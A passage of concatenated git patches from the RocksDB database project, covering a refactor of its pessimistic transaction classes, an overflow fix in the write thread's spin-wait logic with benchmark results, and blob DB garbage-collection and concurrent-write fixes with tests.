PessimisticTxn::UnlockGetForUpdate(ColumnFamilyHandle* column_family, + const Slice& key) { txn_db_impl_->UnLock(this, GetColumnFamilyID(column_family), key.ToString()); } -Status TransactionImpl::SetName(const TransactionName& name) { +Status PessimisticTxn::SetName(const TransactionName& name) { Status s; if (txn_state_ == STARTED) { if (name_.length()) { diff --git a/utilities/transactions/transaction_impl.h b/utilities/transactions/transaction_impl.h index 01f8f4b2a2d..8445b0a50ab 100644 --- a/utilities/transactions/transaction_impl.h +++ b/utilities/transactions/transaction_impl.h @@ -31,24 +31,28 @@ namespace rocksdb { class TransactionDBImpl; +class PessimisticTxn; -class TransactionImpl : public TransactionBaseImpl { +// A transaction under pessimistic concurrency control. This class implements +// the locking API and interfaces with the lock manager as well as the +// pessimistic transactional db. +class PessimisticTxn : public TransactionBaseImpl { public: - TransactionImpl(TransactionDB* db, const WriteOptions& write_options, - const TransactionOptions& txn_options); + PessimisticTxn(TransactionDB* db, const WriteOptions& write_options, + const TransactionOptions& txn_options); - virtual ~TransactionImpl(); + virtual ~PessimisticTxn(); void Reinitialize(TransactionDB* txn_db, const WriteOptions& write_options, const TransactionOptions& txn_options); - Status Prepare() override; + Status Prepare() override = 0; - Status Commit() override; + Status Commit() override = 0; - Status CommitBatch(WriteBatch* batch); + virtual Status CommitBatch(WriteBatch* batch) = 0; - Status Rollback() override; + Status Rollback() override = 0; Status RollbackToSavePoint() override; @@ -107,14 +111,24 @@ class TransactionImpl : public TransactionBaseImpl { int64_t GetDeadlockDetectDepth() const { return deadlock_detect_depth_; } protected: + void Initialize(const TransactionOptions& txn_options); + + Status LockBatch(WriteBatch* batch, TransactionKeyMap* keys_to_unlock); + Status TryLock(ColumnFamilyHandle* column_family, const Slice& key, bool read_only, bool exclusive, bool untracked = false) override; - private: + void Clear() override; + TransactionDBImpl* txn_db_impl_; DBImpl* db_impl_; + // If non-zero, this transaction should not be committed after this time (in + // microseconds according to Env->NowMicros()) + uint64_t expiration_time_; + + private: // Used to create unique ids for transactions. static std::atomic txn_id_counter_; @@ -140,10 +154,6 @@ class TransactionImpl : public TransactionBaseImpl { // Mutex protecting waiting_txn_ids_, waiting_cf_id_ and waiting_key_. mutable std::mutex wait_mutex_; - // If non-zero, this transaction should not be committed after this time (in - // microseconds according to Env->NowMicros()) - uint64_t expiration_time_; - // Timeout in microseconds when locking a key or -1 if there is no timeout. int64_t lock_timeout_; @@ -153,32 +163,46 @@ class TransactionImpl : public TransactionBaseImpl { // Whether to perform deadlock detection or not. int64_t deadlock_detect_depth_; - void Clear() override; - - void Initialize(const TransactionOptions& txn_options); - Status ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice& key, SequenceNumber prev_seqno, SequenceNumber* new_seqno); - Status LockBatch(WriteBatch* batch, TransactionKeyMap* keys_to_unlock); + void UnlockGetForUpdate(ColumnFamilyHandle* column_family, + const Slice& key) override; - Status DoCommit(WriteBatch* batch); + // No copying allowed + PessimisticTxn(const PessimisticTxn&); + void operator=(const PessimisticTxn&); +}; - void RollbackLastN(size_t num); +class WriteCommittedTxnImpl : public PessimisticTxn { + public: + WriteCommittedTxnImpl(TransactionDB* db, const WriteOptions& write_options, + const TransactionOptions& txn_options); - void UnlockGetForUpdate(ColumnFamilyHandle* column_family, - const Slice& key) override; + virtual ~WriteCommittedTxnImpl() {} + + Status Prepare() override; + + Status Commit() override; + + Status CommitBatch(WriteBatch* batch) override; + + Status Rollback() override; + + private: + Status ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice& key, + SequenceNumber prev_seqno, SequenceNumber* new_seqno); // No copying allowed - TransactionImpl(const TransactionImpl&); - void operator=(const TransactionImpl&); + WriteCommittedTxnImpl(const WriteCommittedTxnImpl&); + void operator=(const WriteCommittedTxnImpl&); }; // Used at commit time to check whether transaction is committing before its // expiration time. class TransactionCallback : public WriteCallback { public: - explicit TransactionCallback(TransactionImpl* txn) : txn_(txn) {} + explicit TransactionCallback(PessimisticTxn* txn) : txn_(txn) {} Status Callback(DB* db) override { if (txn_->IsExpired()) { @@ -191,7 +215,7 @@ class TransactionCallback : public WriteCallback { bool AllowWriteBatching() override { return true; } private: - TransactionImpl* txn_; + PessimisticTxn* txn_; }; } // namespace rocksdb diff --git a/utilities/transactions/transaction_lock_mgr.cc b/utilities/transactions/transaction_lock_mgr.cc index 1184f667d81..99e71eeb0de 100644 --- a/utilities/transactions/transaction_lock_mgr.cc +++ b/utilities/transactions/transaction_lock_mgr.cc @@ -227,7 +227,7 @@ bool TransactionLockMgr::IsLockExpired(TransactionID txn_id, return expired; } -Status TransactionLockMgr::TryLock(TransactionImpl* txn, +Status TransactionLockMgr::TryLock(PessimisticTxn* txn, uint32_t column_family_id, const std::string& key, Env* env, bool exclusive) { @@ -256,7 +256,7 @@ Status TransactionLockMgr::TryLock(TransactionImpl* txn, // Helper function for TryLock(). Status TransactionLockMgr::AcquireWithTimeout( - TransactionImpl* txn, LockMap* lock_map, LockMapStripe* stripe, + PessimisticTxn* txn, LockMap* lock_map, LockMapStripe* stripe, uint32_t column_family_id, const std::string& key, Env* env, int64_t timeout, const LockInfo& lock_info) { Status result; @@ -357,13 +357,13 @@ Status TransactionLockMgr::AcquireWithTimeout( } void TransactionLockMgr::DecrementWaiters( - const TransactionImpl* txn, const autovector& wait_ids) { + const PessimisticTxn* txn, const autovector& wait_ids) { std::lock_guard lock(wait_txn_map_mutex_); DecrementWaitersImpl(txn, wait_ids); } void TransactionLockMgr::DecrementWaitersImpl( - const TransactionImpl* txn, const autovector& wait_ids) { + const PessimisticTxn* txn, const autovector& wait_ids) { auto id = txn->GetID(); assert(wait_txn_map_.Contains(id)); wait_txn_map_.Delete(id); @@ -377,7 +377,7 @@ void TransactionLockMgr::DecrementWaitersImpl( } bool TransactionLockMgr::IncrementWaiters( - const TransactionImpl* txn, const autovector& wait_ids) { + const PessimisticTxn* txn, const autovector& wait_ids) { auto id = txn->GetID(); std::vector queue(txn->GetDeadlockDetectDepth()); std::lock_guard lock(wait_txn_map_mutex_); @@ -501,7 +501,7 @@ Status TransactionLockMgr::AcquireLocked(LockMap* lock_map, return result; } -void TransactionLockMgr::UnLockKey(const TransactionImpl* txn, +void TransactionLockMgr::UnLockKey(const PessimisticTxn* txn, const std::string& key, LockMapStripe* stripe, LockMap* lock_map, Env* env) { @@ -537,7 +537,7 @@ void TransactionLockMgr::UnLockKey(const TransactionImpl* txn, } } -void TransactionLockMgr::UnLock(TransactionImpl* txn, uint32_t column_family_id, +void TransactionLockMgr::UnLock(PessimisticTxn* txn, uint32_t column_family_id, const std::string& key, Env* env) { std::shared_ptr lock_map_ptr = GetLockMap(column_family_id); LockMap* lock_map = lock_map_ptr.get(); @@ -559,7 +559,7 @@ void TransactionLockMgr::UnLock(TransactionImpl* txn, uint32_t column_family_id, stripe->stripe_cv->NotifyAll(); } -void TransactionLockMgr::UnLock(const TransactionImpl* txn, +void TransactionLockMgr::UnLock(const PessimisticTxn* txn, const TransactionKeyMap* key_map, Env* env) { for (auto& key_map_iter : *key_map) { uint32_t column_family_id = key_map_iter.first; diff --git a/utilities/transactions/transaction_lock_mgr.h b/utilities/transactions/transaction_lock_mgr.h index 6389f8d7d3d..6c0d1e99dc0 100644 --- a/utilities/transactions/transaction_lock_mgr.h +++ b/utilities/transactions/transaction_lock_mgr.h @@ -47,14 +47,14 @@ class TransactionLockMgr { // Attempt to lock key. If OK status is returned, the caller is responsible // for calling UnLock() on this key. - Status TryLock(TransactionImpl* txn, uint32_t column_family_id, + Status TryLock(PessimisticTxn* txn, uint32_t column_family_id, const std::string& key, Env* env, bool exclusive); // Unlock a key locked by TryLock(). txn must be the same Transaction that // locked this key. - void UnLock(const TransactionImpl* txn, const TransactionKeyMap* keys, + void UnLock(const PessimisticTxn* txn, const TransactionKeyMap* keys, Env* env); - void UnLock(TransactionImpl* txn, uint32_t column_family_id, + void UnLock(PessimisticTxn* txn, uint32_t column_family_id, const std::string& key, Env* env); using LockStatusData = std::unordered_multimap; @@ -102,7 +102,7 @@ class TransactionLockMgr { std::shared_ptr GetLockMap(uint32_t column_family_id); - Status AcquireWithTimeout(TransactionImpl* txn, LockMap* lock_map, + Status AcquireWithTimeout(PessimisticTxn* txn, LockMap* lock_map, LockMapStripe* stripe, uint32_t column_family_id, const std::string& key, Env* env, int64_t timeout, const LockInfo& lock_info); @@ -112,14 +112,14 @@ class TransactionLockMgr { const LockInfo& lock_info, uint64_t* wait_time, autovector* txn_ids); - void UnLockKey(const TransactionImpl* txn, const std::string& key, + void UnLockKey(const PessimisticTxn* txn, const std::string& key, LockMapStripe* stripe, LockMap* lock_map, Env* env); - bool IncrementWaiters(const TransactionImpl* txn, + bool IncrementWaiters(const PessimisticTxn* txn, const autovector& wait_ids); - void DecrementWaiters(const TransactionImpl* txn, + void DecrementWaiters(const PessimisticTxn* txn, const autovector& wait_ids); - void DecrementWaitersImpl(const TransactionImpl* txn, + void DecrementWaitersImpl(const PessimisticTxn* txn, const autovector& wait_ids); // No copying allowed diff --git a/utilities/transactions/write_prepared_transaction_impl.cc b/utilities/transactions/write_prepared_transaction_impl.cc new file mode 100644 index 00000000000..ded6bcb2bc6 --- /dev/null +++ b/utilities/transactions/write_prepared_transaction_impl.cc @@ -0,0 +1,65 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +#ifndef ROCKSDB_LITE + +#include "utilities/transactions/write_prepared_transaction_impl.h" + +#include +#include +#include +#include + +#include "db/column_family.h" +#include "db/db_impl.h" +#include "rocksdb/comparator.h" +#include "rocksdb/db.h" +#include "rocksdb/snapshot.h" +#include "rocksdb/status.h" +#include "rocksdb/utilities/transaction_db.h" +#include "util/string_util.h" +#include "util/sync_point.h" +#include "utilities/transactions/transaction_db_impl.h" +#include "utilities/transactions/transaction_impl.h" +#include "utilities/transactions/transaction_util.h" + +namespace rocksdb { + +struct WriteOptions; + +WritePreparedTxnImpl::WritePreparedTxnImpl( + TransactionDB* txn_db, const WriteOptions& write_options, + const TransactionOptions& txn_options) + : PessimisticTxn(txn_db, write_options, txn_options) { + PessimisticTxn::Initialize(txn_options); +} + +Status WritePreparedTxnImpl::CommitBatch(WriteBatch* batch) { + // TODO(myabandeh) Implement this + throw std::runtime_error("CommitBatch not Implemented"); + return Status::OK(); +} + +Status WritePreparedTxnImpl::Prepare() { + // TODO(myabandeh) Implement this + throw std::runtime_error("Prepare not Implemented"); + return Status::OK(); +} + +Status WritePreparedTxnImpl::Commit() { + // TODO(myabandeh) Implement this + throw std::runtime_error("Commit not Implemented"); + return Status::OK(); +} + +Status WritePreparedTxnImpl::Rollback() { + // TODO(myabandeh) Implement this + throw std::runtime_error("Rollback not Implemented"); + return Status::OK(); +} + +} // namespace rocksdb + +#endif // ROCKSDB_LITE diff --git a/utilities/transactions/write_prepared_transaction_impl.h b/utilities/transactions/write_prepared_transaction_impl.h new file mode 100644 index 00000000000..eab2b8669f7 --- /dev/null +++ b/utilities/transactions/write_prepared_transaction_impl.h @@ -0,0 +1,70 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +#pragma once + +#ifndef ROCKSDB_LITE + +#include +#include +#include +#include +#include +#include +#include + +#include "db/write_callback.h" +#include "rocksdb/db.h" +#include "rocksdb/slice.h" +#include "rocksdb/snapshot.h" +#include "rocksdb/status.h" +#include "rocksdb/types.h" +#include "rocksdb/utilities/transaction.h" +#include "rocksdb/utilities/transaction_db.h" +#include "rocksdb/utilities/write_batch_with_index.h" +#include "util/autovector.h" +#include "utilities/transactions/transaction_base.h" +#include "utilities/transactions/transaction_impl.h" +#include "utilities/transactions/transaction_util.h" + +namespace rocksdb { + +class TransactionDBImpl; + +// This impl could write to DB also uncomitted data and then later tell apart +// committed data from uncomitted data. Uncommitted data could be after the +// Prepare phase in 2PC (WritePreparedTxnImpl) or before that +// (WriteUnpreparedTxnImpl). +class WritePreparedTxnImpl : public PessimisticTxn { + public: + WritePreparedTxnImpl(TransactionDB* db, const WriteOptions& write_options, + const TransactionOptions& txn_options); + + virtual ~WritePreparedTxnImpl() {} + + Status Prepare() override; + + Status Commit() override; + + Status CommitBatch(WriteBatch* batch) override; + + Status Rollback() override; + + private: + // TODO(myabandeh): verify that the current impl work with values being + // written with prepare sequence number too. + // Status ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice& + // key, + // SequenceNumber prev_seqno, SequenceNumber* + // new_seqno); + + // No copying allowed + WritePreparedTxnImpl(const WritePreparedTxnImpl&); + void operator=(const WritePreparedTxnImpl&); +}; + +} // namespace rocksdb + +#endif // ROCKSDB_LITE From 58410aee44e902735659b80364eecc0e075676e9 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Thu, 3 Aug 2017 10:36:50 -0700 Subject: [PATCH 070/205] Fix the overflow bug in AwaitState Summary: https://github.com/facebook/rocksdb/issues/2559 reports an overflow in AwaitState. nbronson has debugged the issue and presented the fix, which is applied to this patch. Moreover this patch adds more comments to clarify the logic in AwaitState. I tried with both 16 and 64 threads on update benchmark. The fix lowers cpu usage by 1.6 but also lowers the throughput by 1.6 and 2% respectively. Apparently the bug had favored using the spinning more often. Benchmarks: TEST_TMPDIR=/dev/shm/tmpdb time ./db_bench --benchmarks="fillrandom" --threads=16 --num=2000000 TEST_TMPDIR=/dev/shm/tmpdb time ./db_bench --use_existing_db=1 --benchmarks="updaterandom[X3]" --threads=16 --num=2000000 TEST_TMPDIR=/dev/shm/tmpdb time ./db_bench --use_existing_db=1 --benchmarks="updaterandom[X3]" --threads=64 --num=200000 Results $ cat update-16t-bug.txt | tail -4 updaterandom [AVG 3 runs] : 234117 ops/sec; 51.8 MB/sec updaterandom [MEDIAN 3 runs] : 233581 ops/sec; 51.7 MB/sec 3896.42user 1539.12system 6:50.61elapsed 1323%CPU (0avgtext+0avgdata 331308maxresident)k 0inputs+0outputs (0major+1281001minor)pagefaults 0swaps $ cat update-16t-fixed.txt | tail -4 updaterandom [AVG 3 runs] : 230364 ops/sec; 51.0 MB/sec updaterandom [MEDIAN 3 runs] : 226169 ops/sec; 50.0 MB/sec 3865.46user 1568.32system 6:57.63elapsed 1301%CPU (0avgtext+0avgdata 315012maxresident)k 0inputs+0outputs (0major+1342568minor)pagefaults 0swaps $ cat update-64t-bug.txt | tail -4 updaterandom [AVG 3 runs] : 261878 ops/sec; 57.9 MB/sec updaterandom [MEDIAN 3 runs] : 262859 ops/sec; 58.2 MB/sec 926.27user 578.06system 2:27.46elapsed 1020%CPU (0avgtext+0avgdata 475480maxresident)k 0inputs+0outputs (0major+1058728minor)pagefaults 0swaps $ cat update-64t-fixed.txt | tail -4 updaterandom [AVG 3 runs] : 256699 ops/sec; 56.8 MB/sec updaterandom [MEDIAN 3 runs] : 256380 ops/sec; 56.7 MB/sec 933.47user 575.37system 2:30.41elapsed 1003%CPU (0avgtext+0avgdata 482340maxresident)k 0inputs+0outputs (0major+1078557minor)pagefaults 0swaps Closes https://github.com/facebook/rocksdb/pull/2679 Differential Revision: D5553732 Pulled By: maysamyabandeh fbshipit-source-id: 98b72dc3a8e0f22ea29d4f7c7790af10c369c5bb --- db/write_thread.cc | 32 ++++++++++++++++++++++++++------ 1 file changed, 26 insertions(+), 6 deletions(-) diff --git a/db/write_thread.cc b/db/write_thread.cc index 4a9fc1406bf..2d3b34602cc 100644 --- a/db/write_thread.cc +++ b/db/write_thread.cc @@ -57,6 +57,10 @@ uint8_t WriteThread::AwaitState(Writer* w, uint8_t goal_mask, AdaptationContext* ctx) { uint8_t state; + // 1. Busy loop using "pause" for 1 micro sec + // 2. Else SOMETIMES busy loop using "yield" for 100 micro sec (default) + // 3. Else blocking wait + // On a modern Xeon each loop takes about 7 nanoseconds (most of which // is the effect of the pause instruction), so 200 iterations is a bit // more than a microsecond. This is long enough that waits longer than @@ -114,13 +118,21 @@ uint8_t WriteThread::AwaitState(Writer* w, uint8_t goal_mask, const size_t kMaxSlowYieldsWhileSpinning = 3; + // Whether the yield approach has any credit in this context. The credit is + // added by yield being succesfull before timing out, and decreased otherwise. + auto& yield_credit = ctx->value; + // Update the yield_credit based on sample runs or right after a hard failure bool update_ctx = false; + // Should we reinforce the yield credit bool would_spin_again = false; + // The samling base for updating the yeild credit. The sampling rate would be + // 1/sampling_base. + const int sampling_base = 256; if (max_yield_usec_ > 0) { - update_ctx = Random::GetTLSInstance()->OneIn(256); + update_ctx = Random::GetTLSInstance()->OneIn(sampling_base); - if (update_ctx || ctx->value.load(std::memory_order_relaxed) >= 0) { + if (update_ctx || yield_credit.load(std::memory_order_relaxed) >= 0) { // we're updating the adaptation statistics, or spinning has > // 50% chance of being shorter than max_yield_usec_ and causing no // involuntary context switches @@ -149,7 +161,7 @@ uint8_t WriteThread::AwaitState(Writer* w, uint8_t goal_mask, // accurate enough to measure the yield duration ++slow_yield_count; if (slow_yield_count >= kMaxSlowYieldsWhileSpinning) { - // Not just one ivcsw, but several. Immediately update ctx + // Not just one ivcsw, but several. Immediately update yield_credit // and fall back to blocking update_ctx = true; break; @@ -165,11 +177,19 @@ uint8_t WriteThread::AwaitState(Writer* w, uint8_t goal_mask, } if (update_ctx) { - auto v = ctx->value.load(std::memory_order_relaxed); + // Since our update is sample based, it is ok if a thread overwrites the + // updates by other threads. Thus the update does not have to be atomic. + auto v = yield_credit.load(std::memory_order_relaxed); // fixed point exponential decay with decay constant 1/1024, with +1 // and -1 scaled to avoid overflow for int32_t - v = v + (v / 1024) + (would_spin_again ? 1 : -1) * 16384; - ctx->value.store(v, std::memory_order_relaxed); + // + // On each update the positive credit is decayed by a facor of 1/1024 (i.e., + // 0.1%). If the sampled yield was successful, the credit is also increased + // by X. Setting X=2^17 ensures that the credit never exceeds + // 2^17*2^10=2^27, which is lower than 2^31 the upperbound of int32_t. Same + // logic applies to negative credits. + v = v - (v / 1024) + (would_spin_again ? 1 : -1) * 131072; + yield_credit.store(v, std::memory_order_relaxed); } assert((state & goal_mask) != 0); From 2c45ada4c4b09d4130b8bc0593c25f90d5dc8795 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 3 Aug 2017 12:56:44 -0700 Subject: [PATCH 071/205] Blob DB garbage collection should keep keys with newer version Summary: Fix the bug where if blob db garbage collection revmoe keys with newer version. It shouldn't delete the key from base db when sequence number in base db is not equal to the one in blob log. Closes https://github.com/facebook/rocksdb/pull/2678 Differential Revision: D5549752 Pulled By: yiwu-arbug fbshipit-source-id: abb8649260963b5c389748023970fd746279d227 --- utilities/blob_db/blob_db_impl.cc | 136 ++++++++++++++++-------------- utilities/blob_db/blob_db_test.cc | 42 ++++++++- 2 files changed, 112 insertions(+), 66 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 0488d99242a..f74307e191b 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1712,10 +1712,17 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, gcstats->blob_count++; bool del_this = false; + bool reloc_this = false; + + // TODO(yiwu): The following logic should use GetForUpdate() from + // optimistic transaction to check if the key is current, otherwise + // there can be another writer sneak in between sequence number of + // and the deletion. + // this particular TTL has expired if (no_relocation_ttl || (has_ttl && tt > record.GetTTL())) { del_this = true; - } else { + } else if (!first_gc) { SequenceNumber seq = kMaxSequenceNumber; bool found_record_for_key = false; SuperVersion* sv = db_impl_->GetAndRefSuperVersion(cfd); @@ -1726,8 +1733,8 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, } Status s1 = db_impl_->GetLatestSequenceForKey( sv, record.Key(), false, &seq, &found_record_for_key); - if (s1.IsNotFound() || (!found_record_for_key || seq != record.GetSN())) { - del_this = true; + if (found_record_for_key && seq == record.GetSN()) { + reloc_this = true; } db_impl_->ReturnAndCleanupSuperVersion(cfd, sv); } @@ -1749,77 +1756,76 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, gcstats->overrided_while_delete++; } delete txn; - continue; - } else if (first_gc) { - continue; } - if (!newfile) { - // new file - std::string reason("GC of "); - reason += bfptr->PathName(); - newfile = NewBlobFile(reason); - gcstats->newfile = newfile; - - new_writer = CheckOrCreateWriterLocked(newfile); - newfile->header_ = std::move(header); - // Can't use header beyond this point - newfile->header_valid_ = true; - newfile->file_size_ = BlobLogHeader::kHeaderSize; - s = new_writer->WriteHeader(newfile->header_); - - if (!s.ok()) { - ROCKS_LOG_ERROR(db_options_.info_log, - "File: %s - header writing failed", - newfile->PathName().c_str()); - return s; + if (reloc_this) { + if (!newfile) { + // new file + std::string reason("GC of "); + reason += bfptr->PathName(); + newfile = NewBlobFile(reason); + gcstats->newfile = newfile; + + new_writer = CheckOrCreateWriterLocked(newfile); + newfile->header_ = std::move(header); + // Can't use header beyond this point + newfile->header_valid_ = true; + newfile->file_size_ = BlobLogHeader::kHeaderSize; + s = new_writer->WriteHeader(newfile->header_); + + if (!s.ok()) { + ROCKS_LOG_ERROR(db_options_.info_log, + "File: %s - header writing failed", + newfile->PathName().c_str()); + return s; + } + + WriteLock wl(&mutex_); + + dir_change_.store(true); + blob_files_.insert(std::make_pair(newfile->BlobFileNumber(), newfile)); } - WriteLock wl(&mutex_); + gcstats->num_relocs++; + std::string index_entry; - dir_change_.store(true); - blob_files_.insert(std::make_pair(newfile->BlobFileNumber(), newfile)); - } + uint64_t blob_offset = 0; + uint64_t key_offset = 0; + // write the blob to the blob log. + s = new_writer->AddRecord(record.Key(), record.Blob(), &key_offset, + &blob_offset, record.GetTTL()); - gcstats->num_relocs++; - std::string index_entry; + BlobHandle handle; + handle.set_filenumber(newfile->BlobFileNumber()); + handle.set_size(record.Blob().size()); + handle.set_offset(blob_offset); + handle.set_compression(bdb_options_.compression); + handle.EncodeTo(&index_entry); - uint64_t blob_offset = 0; - uint64_t key_offset = 0; - // write the blob to the blob log. - s = new_writer->AddRecord(record.Key(), record.Blob(), &key_offset, - &blob_offset, record.GetTTL()); + new_writer->AddRecordFooter(record.GetSN()); + newfile->blob_count_++; + newfile->file_size_ += BlobLogRecord::kHeaderSize + record.Key().size() + + record.Blob().size() + BlobLogRecord::kFooterSize; - BlobHandle handle; - handle.set_filenumber(newfile->BlobFileNumber()); - handle.set_size(record.Blob().size()); - handle.set_offset(blob_offset); - handle.set_compression(bdb_options_.compression); - handle.EncodeTo(&index_entry); - - new_writer->AddRecordFooter(record.GetSN()); - newfile->blob_count_++; - newfile->file_size_ += BlobLogRecord::kHeaderSize + record.Key().size() + - record.Blob().size() + BlobLogRecord::kFooterSize; - - Transaction* txn = opt_db_->BeginTransaction( - write_options_, OptimisticTransactionOptions(), nullptr); - txn->Put(cfh, record.Key(), index_entry); - Status s1 = txn->Commit(); - // chances that this Put will fail is low. If it fails, it would be because - // a new version of the key came in at this time, which will override - // the current version being iterated on. - if (s1.IsBusy()) { - ROCKS_LOG_INFO(db_options_.info_log, - "Optimistic transaction failed: %s put bn: %" PRIu32, - bfptr->PathName().c_str(), gcstats->blob_count); - } else { - gcstats->succ_relocs++; - ROCKS_LOG_DEBUG(db_options_.info_log, - "Successfully added put back into LSM: %s bn: %" PRIu32, - bfptr->PathName().c_str(), gcstats->blob_count); + Transaction* txn = opt_db_->BeginTransaction( + write_options_, OptimisticTransactionOptions(), nullptr); + txn->Put(cfh, record.Key(), index_entry); + Status s1 = txn->Commit(); + // chances that this Put will fail is low. If it fails, it would be + // because a new version of the key came in at this time, which will + // override the current version being iterated on. + if (s1.IsBusy()) { + ROCKS_LOG_INFO(db_options_.info_log, + "Optimistic transaction failed: %s put bn: %" PRIu32, + bfptr->PathName().c_str(), gcstats->blob_count); + } else { + gcstats->succ_relocs++; + ROCKS_LOG_DEBUG(db_options_.info_log, + "Successfully added put back into LSM: %s bn: %" PRIu32, + bfptr->PathName().c_str(), gcstats->blob_count); + } + delete txn; } - delete txn; } if (gcstats->newfile) total_blob_space_ += newfile->file_size_; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index a5f9795929f..a3873729cf5 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -12,6 +12,7 @@ #include #include "db/db_test_util.h" #include "port/port.h" +#include "util/cast_util.h" #include "util/random.h" #include "util/string_util.h" #include "util/testharness.h" @@ -531,7 +532,8 @@ TEST_F(BlobDBTest, SequenceNumber) { bdb_options.disable_background_tasks = true; Open(bdb_options); SequenceNumber sequence = blob_db_->GetLatestSequenceNumber(); - BlobDBImpl *blob_db_impl = reinterpret_cast(blob_db_); + BlobDBImpl *blob_db_impl = + static_cast_with_check(blob_db_); for (int i = 0; i < 100; i++) { std::string key = "key" + ToString(i); PutRandom(key, &rnd); @@ -560,6 +562,44 @@ TEST_F(BlobDBTest, SequenceNumber) { } } +TEST_F(BlobDBTest, GCShouldKeepKeysWithNewerVersion) { + Random rnd(301); + BlobDBOptions bdb_options; + bdb_options.disable_background_tasks = true; + Open(bdb_options); + BlobDBImpl *blob_db_impl = + static_cast_with_check(blob_db_); + DBImpl *db_impl = static_cast_with_check(blob_db_->GetBaseDB()); + std::map data; + for (int i = 0; i < 200; i++) { + PutRandom("key" + ToString(i), &rnd, &data); + } + auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + blob_db_impl->TEST_CloseBlobFile(blob_files[0]); + // Test for data in SST + size_t new_keys = 0; + for (int i = 0; i < 100; i++) { + if (rnd.Next() % 2 == 1) { + new_keys++; + PutRandom("key" + ToString(i), &rnd, &data); + } + } + db_impl->TEST_FlushMemTable(true /*wait*/); + // Test for data in memtable + for (int i = 100; i < 200; i++) { + if (rnd.Next() % 2 == 1) { + new_keys++; + PutRandom("key" + ToString(i), &rnd, &data); + } + } + GCStats gc_stats; + ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_EQ(0, gc_stats.num_deletes); + ASSERT_EQ(200 - new_keys, gc_stats.num_relocs); + VerifyDB(data); +} + } // namespace blob_db } // namespace rocksdb From 0b814ba92d70017a652603665295a3629927cfe1 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 3 Aug 2017 15:07:01 -0700 Subject: [PATCH 072/205] Allow concurrent writes to blob db Summary: I'm going with brute-force solution, just letting Put() and Write() holding a mutex before writing. May improve concurrent writing with finer granularity locking later. Closes https://github.com/facebook/rocksdb/pull/2682 Differential Revision: D5552690 Pulled By: yiwu-arbug fbshipit-source-id: 039abd675b5d274a7af6428198d1733cafecef4c --- utilities/blob_db/blob_db_impl.cc | 4 ++++ utilities/blob_db/blob_db_impl.h | 3 +++ utilities/blob_db/blob_db_test.cc | 33 +++++++++++++++++++++++-------- 3 files changed, 32 insertions(+), 8 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index f74307e191b..1afdc94a06e 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -28,6 +28,7 @@ #include "util/file_reader_writer.h" #include "util/filename.h" #include "util/logging.h" +#include "util/mutexlock.h" #include "util/random.h" #include "util/timer_queue.h" #include "utilities/transactions/optimistic_transaction_db_impl.h" @@ -878,6 +879,8 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { } }; + MutexLock l(&write_mutex_); + SequenceNumber sequence = db_impl_->GetLatestSequenceNumber() + 1; BlobInserter blob_inserter(this, sequence); updates->Iterate(&blob_inserter); @@ -953,6 +956,7 @@ Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, Status BlobDBImpl::PutUntil(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value_unc, int32_t expiration) { + MutexLock l(&write_mutex_); UpdateWriteOptions(options); std::shared_ptr bfile = diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 95a387afe37..5105c8c17b1 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -447,6 +447,9 @@ class BlobDBImpl : public BlobDB { // HEAVILY TRAFFICKED port::RWMutex mutex_; + // Writers has to hold write_mutex_ before writing. + mutable port::Mutex write_mutex_; + // counter for blob file number std::atomic next_file_number_; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index a3873729cf5..199a9e0750a 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -511,18 +511,35 @@ TEST_F(BlobDBTest, Compression) { } #endif -TEST_F(BlobDBTest, DISABLED_MultipleWriters) { - Open(); +TEST_F(BlobDBTest, MultipleWriters) { + Open(BlobDBOptions()); std::vector workers; - for (size_t ii = 0; ii < 10; ii++) - workers.push_back(port::Thread(&BlobDBTest::InsertBlobs, this)); - - for (auto& t : workers) { - if (t.joinable()) { - t.join(); + std::vector> data_set(10); + for (uint32_t i = 0; i < 10; i++) + workers.push_back(port::Thread( + [&](uint32_t id) { + Random rnd(301 + id); + for (int j = 0; j < 100; j++) { + std::string key = "key" + ToString(id) + "_" + ToString(j); + if (id < 5) { + PutRandom(key, &rnd, &data_set[id]); + } else { + WriteBatch batch; + PutRandomToWriteBatch(key, &rnd, &batch, &data_set[id]); + blob_db_->Write(WriteOptions(), &batch); + } + } + }, + i)); + std::map data; + for (size_t i = 0; i < 10; i++) { + if (workers[i].joinable()) { + 